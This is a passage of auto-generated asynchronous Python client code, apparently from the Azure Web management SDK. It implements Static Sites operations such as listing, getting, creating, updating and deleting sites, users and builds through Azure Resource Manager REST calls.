You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.web.v2020_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def preview_workflow(
self,
location: str,
static_sites_workflow_preview_request: "_models.StaticSitesWorkflowPreviewRequest",
**kwargs
) -> "_models.StaticSitesWorkflowPreview":
"""Generates a preview workflow file for the static site.
Description for Generates a preview workflow file for the static site.
:param location: Location where you plan to create the static site.
:type location: str
:param static_sites_workflow_preview_request: A JSON representation of the
StaticSitesWorkflowPreviewRequest properties. See example.
:type static_sites_workflow_preview_request: ~azure.mgmt.web.v2020_09_01.models.StaticSitesWorkflowPreviewRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StaticSitesWorkflowPreview, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StaticSitesWorkflowPreview
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSitesWorkflowPreview"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.preview_workflow.metadata['url'] # type: ignore
path_format_arguments = {
'location': self._serialize.url("location", location, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(static_sites_workflow_preview_request, 'StaticSitesWorkflowPreviewRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('StaticSitesWorkflowPreview', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
preview_workflow.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Web/locations/{location}/previewStaticSiteWorkflowFile'} # type: ignore
def list(
self,
**kwargs
) -> AsyncIterable["_models.StaticSiteCollection"]:
"""Get all Static Sites for a subscription.
Description for Get all Static Sites for a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StaticSiteCollection or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.StaticSiteCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StaticSiteCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Web/staticSites'} # type: ignore
def get_static_sites_by_resource_group(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.StaticSiteCollection"]:
"""Gets all static sites in the specified resource group.
Description for Gets all static sites in the specified resource group.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StaticSiteCollection or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.StaticSiteCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_static_sites_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StaticSiteCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_static_sites_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites'} # type: ignore
async def get_static_site(
self,
resource_group_name: str,
name: str,
**kwargs
) -> "_models.StaticSiteARMResource":
"""Gets the details of a static site.
Description for Gets the details of a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StaticSiteARMResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StaticSiteARMResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteARMResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.get_static_site.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('StaticSiteARMResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_static_site.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}'} # type: ignore
async def create_or_update_static_site(
self,
resource_group_name: str,
name: str,
static_site_envelope: "_models.StaticSiteARMResource",
**kwargs
) -> "_models.StaticSiteARMResource":
"""Creates a new static site in an existing resource group, or updates an existing static site.
Description for Creates a new static site in an existing resource group, or updates an existing
static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site to create or update.
:type name: str
:param static_site_envelope: A JSON representation of the staticsite properties. See example.
:type static_site_envelope: ~azure.mgmt.web.v2020_09_01.models.StaticSiteARMResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StaticSiteARMResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StaticSiteARMResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteARMResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update_static_site.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(static_site_envelope, 'StaticSiteARMResource')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('StaticSiteARMResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('StaticSiteARMResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update_static_site.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}'} # type: ignore
async def delete_static_site(
self,
resource_group_name: str,
name: str,
**kwargs
) -> None:
"""Deletes a static site.
Description for Deletes a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site to delete.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.delete_static_site.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_static_site.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}'} # type: ignore
async def update_static_site(
self,
resource_group_name: str,
name: str,
static_site_envelope: "_models.StaticSitePatchResource",
**kwargs
) -> "_models.StaticSiteARMResource":
"""Creates a new static site in an existing resource group, or updates an existing static site.
Description for Creates a new static site in an existing resource group, or updates an existing
static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site to create or update.
:type name: str
:param static_site_envelope: A JSON representation of the staticsite properties. See example.
:type static_site_envelope: ~azure.mgmt.web.v2020_09_01.models.StaticSitePatchResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StaticSiteARMResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StaticSiteARMResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteARMResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_static_site.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(static_site_envelope, 'StaticSitePatchResource')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('StaticSiteARMResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('StaticSiteARMResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_static_site.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}'} # type: ignore
def list_static_site_users(
self,
resource_group_name: str,
name: str,
authprovider: str,
**kwargs
) -> AsyncIterable["_models.StaticSiteUserCollection"]:
"""Gets the list of users of a static site.
Description for Gets the list of users of a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param authprovider: The auth provider for the users.
:type authprovider: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StaticSiteUserCollection or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.StaticSiteUserCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteUserCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_static_site_users.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'authprovider': self._serialize.url("authprovider", authprovider, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.post(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StaticSiteUserCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_static_site_users.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/authproviders/{authprovider}/listUsers'} # type: ignore
async def delete_static_site_user(
self,
resource_group_name: str,
name: str,
authprovider: str,
userid: str,
**kwargs
) -> None:
"""Deletes the user entry from the static site.
Description for Deletes the user entry from the static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the staticsite.
:type name: str
:param authprovider: The auth provider for this user.
:type authprovider: str
:param userid: The user id of the user.
:type userid: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.delete_static_site_user.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'authprovider': self._serialize.url("authprovider", authprovider, 'str'),
'userid': self._serialize.url("userid", userid, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_static_site_user.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/authproviders/{authprovider}/users/{userid}'} # type: ignore
async def update_static_site_user(
self,
resource_group_name: str,
name: str,
authprovider: str,
userid: str,
static_site_user_envelope: "_models.StaticSiteUserARMResource",
**kwargs
) -> "_models.StaticSiteUserARMResource":
"""Updates a user entry with the listed roles.
Description for Updates a user entry with the listed roles.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param authprovider: The auth provider for this user.
:type authprovider: str
:param userid: The user id of the user.
:type userid: str
:param static_site_user_envelope: A JSON representation of the StaticSiteUser properties. See
example.
:type static_site_user_envelope: ~azure.mgmt.web.v2020_09_01.models.StaticSiteUserARMResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StaticSiteUserARMResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StaticSiteUserARMResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteUserARMResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_static_site_user.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'authprovider': self._serialize.url("authprovider", authprovider, 'str'),
'userid': self._serialize.url("userid", userid, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(static_site_user_envelope, 'StaticSiteUserARMResource')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('StaticSiteUserARMResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_static_site_user.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/authproviders/{authprovider}/users/{userid}'} # type: ignore
def get_static_site_builds(
self,
resource_group_name: str,
name: str,
**kwargs
) -> AsyncIterable["_models.StaticSiteBuildCollection"]:
"""Gets all static site builds for a particular static site.
Description for Gets all static site builds for a particular static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StaticSiteBuildCollection or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.StaticSiteBuildCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteBuildCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_static_site_builds.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StaticSiteBuildCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_static_site_builds.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/builds'} # type: ignore
async def get_static_site_build(
self,
resource_group_name: str,
name: str,
pr_id: str,
**kwargs
) -> "_models.StaticSiteBuildARMResource":
"""Gets the details of a static site build.
Description for Gets the details of a static site build.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param pr_id: The stage site identifier.
:type pr_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StaticSiteBuildARMResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StaticSiteBuildARMResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteBuildARMResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.get_static_site_build.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'prId': self._serialize.url("pr_id", pr_id, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('StaticSiteBuildARMResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_static_site_build.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/builds/{prId}'} # type: ignore
async def delete_static_site_build(
self,
resource_group_name: str,
name: str,
pr_id: str,
**kwargs
) -> None:
"""Deletes a static site build.
Description for Deletes a static site build.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param pr_id: The stage site identifier.
:type pr_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.delete_static_site_build.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'prId': self._serialize.url("pr_id", pr_id, 'str'),
